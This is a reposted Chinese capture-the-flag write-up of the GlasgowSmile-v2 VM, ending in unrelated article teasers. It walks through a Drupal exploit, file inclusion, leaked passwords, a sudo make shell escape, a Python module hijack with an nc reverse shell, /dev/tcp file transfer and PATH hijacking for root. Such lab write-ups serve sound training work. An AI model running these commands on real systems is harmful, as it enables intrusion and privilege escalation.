GlasgowSmile-v2靶机复盘

news2024/10/6 22:23:34

GlasgowSmile-v2靶机复盘

这是一个非常难的靶机

这个靶机是直接给我们ip地址的,所以就不用去找ip地址了,直接对ip进行一个扫描。

发现开通了22,80,83,但是8080端口是个开启我们无法访问的状态,所以可以猜测,这个端口可能没有对外开放,只有本地可以访问。

image-20230704164902369

扫描ip的同时顺便扫描一下目录,用了好几个工具,但是只有dirsearch扫描到了一个有用的目录

 dirsearch -u http://192.168.102.138/

image-20230703193606038

这句话的意思就是写完这个bash文件后记得删除,bash文件都是以sh结尾,所以我们猜测有个.sh文件,专门对这个扫描一下。

 gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x sh -u http://192.168.102.139

image-20230703194022147

image-20230703194336063

扫描到一个joke.sh,打开后发现一行没有注释的命令,这条命令是get一个账号密码登陆这个地址,猜测这是一个登陆地址。

image-20230703194611788

image-20230703194732502

复制打开后发现的确是一个登陆地址。

image-20230703194751309

利用我们的指纹之别系统(wappalyzer)可以发现这是一个Drupal 8的CMS,当时打DC-1这个靶机的时候就是这个系统,有一个专门的扫描工具,droopescan。

image-20230703194817463

image-20230703194851820

image-20230703195058074

我们可以直接searchsploit Drupal 8.3.3查找漏洞,但是在尝试过程中发现msf有现成的。

image-20230703195237136

image-20230703195638883

这样就进去网站的shell了,感觉进入shell距离结束就已经不远了,但是这只是一个开端。

我们在单独扫描这个ip地址时候发现有个开启的8080端口,但是被过滤掉了,所以猜测只能服务器本机可以访问,所以这里我们查看了一下,发现果真只有127.0.0.1可以进行访问,所以我们需要做一个端口转发,让我们也可以访问这个8080端口。

netstat -lntup
-l:只显示监听状态的网络连接。
-n:以数字格式显示端口号,而不是以服务名称的形式显示。
-t:只显示 TCP 协议的网络连接。
-u:只显示 UDP 协议的网络连接。
-p:显示与每个网络连接相关联的进程信息。

端口转发

利用这个命令可以开启8081端口,当我们访问8081端口的时候会把流量转到8080端口,实现访问8080端口。

image-20230703202826332

socat TCP-LISTEN:8081,resueaddr,fork TCP:127.0.0.1:8080

image-20230703203955897

image-20230703204029639

访问后查看源代码发现一行注释,大概意思就是如果你不记得自己密码了,就使用Riddler这个app,并且Nginx比apache2更安全可靠,这里给了我们一个提醒,猜测就是跟riddler或者nginx有关,后来发现的确跟nginx有关系。

image-20230703204118946

点击login后有个忘记密码,点击后发现url发现了变化

image-20230703204303215

很明显可以发现这是一个文件包含的漏洞。

image-20230703204314545

尝试查看/etc/passwd文件,发现查看成功,的确有这个漏洞。

image-20230703204342219

上面给了提示说nginx比apache2更安全可靠,所以这个系统大概率就是nginx服务器,在自己本机上找了一下nginx配置文件的位置,我们尝试查看靶机是否也只这个目录。

image-20230703205753658

成功发现靶机的nginx配置文件也是这个目录。

image-20230703205858522

并且查看源代码后在最底下发现一个include,搜索了一下这个这个目录,发现说这个文件下只有一个default文件,并且我的本机也是只有这个文件。

image-20230703205959941

在靶机上是没有这个文件的,后来联想到配置文件通常以.conf结尾,在后面加上.conf后发现文件名是default.conf

image-20230703210200567

/etc/nginx/sites-enabled/default.conf

image-20230703210436922

在default.conf配置文件中发现有个目录,我们打开这个目录试试。

image-20230703210613444

发现是一个谜语题,问了一下chatgpt有了答案,或者Google搜索也能找到答案,但是百度是没有答案的。

image-20230703210705447

image-20230703210920107

这是后我们就找到了第一个用户的密码,因为我们已经进去shell了,可以cd一下home目录,挨个尝试一下登陆,发现可以登陆上riddler这个用户。

image-20230703210953403

ssh riddler@192.168.102.139
J2h3cUy5Sc4gXLp5VXrE

登陆上以后再riddler的家目录有几个文件,burn执行后是一串php代码,而message.txt中是一串数字,并且给了提醒说这是一个key,所以猜测这个key是用这串php代码加密而来的,我们就需要想办法去解密这串key。

image-20230703212708229

image-20230704172422380

把这串php代码复制到php代码美化工具后就看到了源代码。

image-20230703212916307

根据源码反向写了一个解密代码。

with open("./a.txt") as f:
	for line in f:
		l = line.strip()
		num = int(l[:len(l)-1])
		if l[-1] == "F":
			num -= 2154
		if l[-1] =="A":
			num -= 2190
			
		print(chr(num))

我们把这个key复制到kali中创建一个tmp文件,然后执行以下代码,让每行以AF结尾输出到a.txt中去,再执行我们的解密代码,再把换行符删除掉就解密成功,出现了我们第二个密码。

cat tmp | sed 's/[AF]/&\n/g' | grep -v '^$' > a.txt
cat tmp | tr -d '\n'

image-20230704114753350

image-20230703215418615

UFVE36GvUmK4TcZCxBh8vUEWuYekCY

经过尝试,这是bane的密码。

登陆后sudo -l发现我们可以使用carnage用户身份执行/bin/make命令。

image-20230703215515893

image-20230703215616235

利用carnage这个身份我们可以进入carnage的命令行,网上搜索了一下执行以下命令可以进入carnage的命令行。

image-20230703215703027

COMMAND='/bin/sh'
sudo -u carnage /bin/make -s --eval=$'x:\n\t-'"$COMMAND"

这样我们就进入到了carnage用户下。

image-20230703215837157

image-20230703220719848

美化以下终端,然后我们在/opt/get_out目录下发现一个help.txt,意思就是我们个人文件下的zip压缩包删除后还会自动恢复。

image-20230703221127582

在carnage的home目录中是有一个zip压缩包的,这个压缩包每次删除后都会自动恢复。这里其实是调用了一个python的模块叫做zipfile模块,同时这里运用了计时任务,每隔一段时间会调用moonlight.py这个文件,所以devil.zip这个文件才会被自动恢复。

我们自己创建的zip文件删除后就不会被恢复。

在这里我们可以自己创建一个zipfile.py文件,在moonlight.py所在的目录,这样python调用的时候就会先调用我们这个zipfile.py,我们在这个文件中写一个反弹shell,因为moonlight.py是以venom身份运行的,所以我们可以返回一个venom的shell。

vi zipfile.py
import os
os.system("nc -e /bin/bash 192.168.102.129 8888")

image-20230704084432332

image-20230703224506434

image-20230704091329284

image-20230704092022198

image-20230704092040684

进入venom的用户后查找一下有权限的文件,发现有一堆gothamwillburn文件,我们进去这个目录。

image-20230704092858077

file一下发现这些是可执行文件,经过挨个执行这些文件,发现只有gothamwillburn4可以执行

image-20230704094246812

把gothamwillburn4发送到我们本机进行一个深入了解。

cat gothamwillburn4 > /dev/tcp/192.168.102.137/8888

image-20230704095128522

image-20230704095152011

输出到我们电脑后以exp命名,然后strings命令查看一下,发现这个文件在运行的过程中调用了cat命令,所以我们可以尝试利用cat命令为切入点进行提权。

image-20230704095233999

并且这里的cat不是全目录,所以我们可以修改环境变量,让这个文件运行的时候运行我们自己创建的cat文件。

image-20230704100402878

成功提权。

image-20230704100451468

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/742772.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Redis】—— Redis的RDB持久化机制

💧 【 R e d i s 】—— R e d i s 的 R D B 持久化机制 \color{#FF1493}{【Redis】 —— Redis的RDB持久化机制} 【Redis】——Redis的RDB持久化机制💧 🌷 仰望天空,妳我亦是行人.✨ 🦄 个人主页——微风撞…

Springboot -- Mybatis + Mybatis Generate + KingbaseES8(pgsql) + 静态多数据源

🏛🏛🏛 以下内容记录一次 Springboot 项目整和人大金仓数据库的过程 🏛🏛🏛 文章目录 KingBaseES8SpringBoot整合KES8(pgsql)修改pom文件配置多数据源配置文件配置类 代码生成器配置JsonTypeHandler修改配…

[HDCTF2019]Maze(初识逆向)

下载附件解压,为了方便,我将文件名改为了maze.exe 一般我们先查壳,确实存在UPX壳 对于刚接触逆向的我,一键脱掉哈哈哈 不过还是要说一下,这种脱壳处理有可能会产生其它损坏或者影响,需要进行一定的修复 可…

Visio使用

1.Visio中字母上下标快捷键: 选中要成为上标的文字,ctrlshift"" 选中要成为下标的文字,ctrl"" 2.导入CAD文件 从 AutoCAD 版本 2007 到 2017 导入 .dwg 或 .dxf 文件。 3.编辑CAD文件 右键图形—CAD绘图对象—转换 选择高级 将默认选项改…

居安思危,测试员被裁了还能干什么?

2019年迎来了一大波大佬级公司裁员,包括了阿里、美团、知乎……。它们是各行业的独角兽公司,既是媒体关注的焦点,也是代表了行业风向的指针。 2019年的互联网,已经过了蓬勃发展期,接下来要迎接的更加平稳、规律的发展…

ECM能耗管理云平台

能源是企业运营中不可或缺的要素之一,直接影响企业的成本和竞争力。能源消耗和碳排放不断增长,对环境和可持续发展造成了严重影响。越来越多的企业开始关注并实施能耗管理云平台系统,以实现更高的能源效率、降低碳排放。 ECM能耗管理云平台系…

数分面试题:魔方涂色

问题:现在有一个正方体,现在有6种颜色,给正方体的每一面涂一种颜色,有多少种涂色方法。 注意!正方体是可以旋转的,如果旋转正方体之后,涂色效果和另一种涂色效果相同,那么算是一种涂…

车载开发月薪10k与30k的区别,就是CAN总线技术

CAN(Controller Area Network)总线是一种实时通信协议,是一种广泛应用于车载电子系统中的网络技术。CAN总线技术最初是由德国Bosch公司开发的,用于汽车电子控制系统(ECU)之间的通信,它能够在车辆…

Linux的shell脚本

Linux的shell脚本 😇博主简介:我是一名正在攻读研究生学位的人工智能专业学生,我可以为计算机、人工智能相关本科生和研究生提供排忧解惑的服务。如果您有任何问题或困惑,欢迎随时来交流哦!😄 ✨座右铭&…

Ai数字人浪潮来袭,超写实数字人系统出世,为企业打造定制化服务

数字人概念首次出现在80年代,最初在音乐领域应用,使用手绘技术进行生成。随着时间的推移,传统手绘被CG和动作捕捉等技术取代,从而使虚拟数字人的制作变得更加简化并降低成本。因此,虚拟数字人产业进入产业化探索阶段。…

SpringBoot快速实践 --Ⅰ

文章目录 启动一个SpringBoot项目如何替换内嵌容器玩转SpringBoot配置全局异常处理过滤器拦截器使用Lombok简洁代码使用IDEA HTTP Client进行接口调试 启动一个SpringBoot项目 如果你觉得使用官网来创建太慢了,那你直接把以前项目的依赖粘过来就行了: …

pytorch LBFGS

LBFGS pytorch的LBFGS也是一个优化器 但是与一般的优化器不同 平常我们的顺序是 losscriterion(predict, gt) optim.zero_grad() loss.backward() optim.step()而LBFGS是 def closure():optim.zero_grad()loss criterion(predict, gt)loss.backward()return lossoptim.step…

5.EFLK(ELK+filebeat)+filter过滤

文章目录 EFLK(ELKfilebeat)部署filebeat修改配置文件logstash配置 logstash的filter过滤grok(正则捕获插件)内置正则表达式调用自定义表达式 mutate(数据修改插件)重命名字段添加字段删除字段转换数据类型替换字段内容以"|"为分割符拆分数据成…

系统升级丨让VR全景制作简单再简单

最高端的VR全景 往往只需要最朴素的制作方式 酷雷曼3D VR数字化升级平台4.0版本 闪耀上线 全新的后台界面 丝滑的编辑工具 无需代码 不用建模 简单拖拉拽移 依然有手就行 轻松搭建VR元宇宙空间 1、界面升级,让VR创作更加可视 全新视觉设计 酷雷曼3D VR…

【必读】未来八大最具潜力行业!看懂就赚了

1 网络安全行业 现在保护“网络安全”已经成为世界各国的重要共识。有专家表示,未来网络安全行业有望超越金融、地产业成最赚钱行业。 2 动漫行业 我国的动漫产业才刚刚起步,现在全国各地如北京、上海、杭州、大连、深圳、广州等城市均建立起动漫产业…

2023年中总结:未到年末,立的Flag就已实现

前言 去年年末,搞了一篇年终总结,立了一个小小的Flag,2023年实现全网粉丝量突破1.5万,可以很负责任的告诉大家,截至到当前,不仅已经实现,而且超额完成,虽然这个量,很低&a…

【目标检测】基于yolov5的道路坑洼检测(附代码和数据集)

写在前面: 首先感谢兄弟们的订阅,让我有创作的动力,在创作过程我会尽最大能力,保证作品的质量,如果有问题,可以私信我,让我们携手共进,共创辉煌。 路虽远,行则将至;事虽难,做则必成。只要有愚公移山的志气、滴水穿石的毅力,脚踏实地,埋头苦干,积跬步以至千里,就…

《TCP/IP网络编程》第3,4章学习记录

基础知识: struct sockaddr_in {sa_family_t sin_family; //地址族(Address Family)uint16_t sin_port; //16位TCP/UDP端口号struct in_addr sin_addr; //32位IP地址char sin_zero[8]; //不使用 }sa_family_t包括: (1)AF_INET,IPv4网络协议…

【Linux】分布式监控 Zabbix

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 Zabbix 介绍zabbix 概述Zabbix 监控原理Zabbix 6.0 新特性Zabbix 6.0 功能组件 Zabbix 6.0 部署Zabbix 添加客户端主机Zabbix 自定义监控内容Zabbix 自动发现与自动…

2.1、修改Gitea上传附件大小限制

目录 1. 修改Gitea配置2. 重启服务3. 使用 之前在Gitea上传附件时,显示大小超过3MB,不能符合我的使用场景。记录一下修改这个限制的配置。 1. 修改Gitea配置 默认在安装路径的custom/conf/app.ini文件中: 添加参数 [repository.upload] ; 是…